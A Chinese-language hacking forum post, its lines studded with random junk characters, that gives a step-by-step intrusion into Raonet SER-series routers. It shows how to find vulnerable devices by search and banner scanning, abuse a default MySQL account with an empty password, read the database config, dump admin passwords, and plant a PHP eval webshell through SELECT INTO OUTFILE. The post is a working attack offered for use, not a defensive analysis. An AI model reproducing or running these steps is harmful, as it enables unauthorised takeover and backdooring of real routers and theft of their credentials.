寻找存在漏洞的路由器方法:
; |0 M' Y6 Y7 l1 j+ C: k. g' R( h% k+ C8 ]4 L
1:google搜索'Raonet Subscriber Ethernet Router'1 I" u2 s- \7 s- C9 {; b- t o
' p8 T6 O1 p7 T% W" X+ W
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
9 b, _. E4 W: M7 K! |6 w% p) z- v2 s0 I
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。) B7 h- \$ M0 x4 w# J
/ u( ~8 C1 r. z8 E- E//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
C+ a2 D }$ o! i# v+ N
( z7 v+ i( m1 i1 b9 `/ V" ` 4 Y# T3 a) N! ~( d1 W% }/ ~8 r% K
- ?. n: d2 J6 P入侵步骤:' H, n0 d% C- ^4 k( Y8 w8 ~4 ~/ t
7 f5 e) [0 |& ]4 g3 f# ]
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
7 @3 H% ?) u' ]9 X9 n* s6 c$ |( }0 j' {% X/ q; @# W6 o
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc# F8 J1 | q9 r6 R
3:得到密码后连接,查看GUI管理密码:; `+ W. g `) |! \* h. m9 U
use ser_500
% B+ P& z* u" V6 hselect id,passwd from user;
1 q' V/ O: {* {# S: M7 k# `4:通过数据库写入webshell,执行命令:
+ C4 z I1 _0 x( D' Duse mysql;) C |0 K9 u$ s3 [, i }1 O
create table ok(cmd TEXT);7 p/ F. C3 K9 N
insert into ok values("<?php @eval($_POST[cmd])?>");$ M6 P+ Y1 m4 [# O
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";) r+ y% \! ^ y2 p
drop table ok;6 B) P! n( n7 K, ~/ K3 |6 c
7 e& [8 _5 o6 x3 o5:连接后门shell.php
$ ]# X. o) K! ~% @0 u) t& J c- L8 o6 [0 [
6. 搞定!1 y- k# f9 G- |" H0 A
' p: Q' \2 _; _4 m5 E8 `' A9 i8 q |